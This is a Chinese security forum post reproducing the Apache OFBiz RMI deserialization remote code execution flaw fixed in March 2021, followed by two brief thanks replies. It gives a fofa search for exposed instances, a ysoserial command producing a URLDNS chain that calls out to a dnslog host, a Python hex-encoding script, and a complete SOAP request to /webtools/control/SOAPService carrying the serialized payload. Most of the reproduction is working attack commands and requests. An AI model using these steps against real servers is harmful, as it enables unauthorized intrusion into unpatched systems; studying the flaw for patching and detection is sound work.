用户
搜索
  • TA的每日心情
    开心
    前天 18:01
  • 签到天数: 24 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋-见习白帽

    Rank: 3Rank: 3

    2

    主题

    13

    帖子

    531

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2018-3-23
    发表于 2021-3-25 10:28:34 26471
    本帖最后由 克里斯关下门 于 2021-3-25 02:31 编辑

    Apache OFBiz

    Apache OFBiz是一个非常著名的电子商务平台,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。


    漏洞简介

    2021年3月22日 Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。


    影响版本

    Apache OFBiz < 17.12.06


    漏洞复现

    fofa搜索关键词: app="Apache_OFBiz"

    1.png


    利用ysoserial生成URLDNS利用链:

    java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot

    公众号(黑客前沿)回复 ysoserial 获取下载链接


    利用python脚本将ot文件解码:

    [Python] 纯文本查看 复制代码
    import binascii
    
    filename = 'dns.ot'
    with open(filename, 'rb') as f:
        content = f.read()
    print(binascii.hexlify(content))

    2.png

    构造请求数据包:

    [XML] 纯文本查看 复制代码
    POST /webtools/control/SOAPService HTTP/1.1
    Host: IP:PORT
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
    Content-Length: 1010
    Accept: */*
    Content-Type: application/xml
    Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie:
    Connection: close
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header/>
    <soapenv:Body>
    <ser>
        <map-HashMap>
            <map-Entry>
                <map-Key>
                    <cus-obj>(ot文件解码出来的字符串)</cus-obj>
                </map-Key>
                <map-Value>
                    <std-String value="(DNSlog地址)"/>
                </map-Value>
            </map-Entry>
        </map-HashMap>
    </ser>
    </soapenv:Body>
    </soapenv:Envelope>


    3.png

    提交后,DNSlog收到请求:

    4.png
    欢迎关注我的个人公众号:黑客前沿
    发表于 2021-3-26 10:16:15
    感谢分享
    使用道具 举报 回复
    学习了,又是一波CVE
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册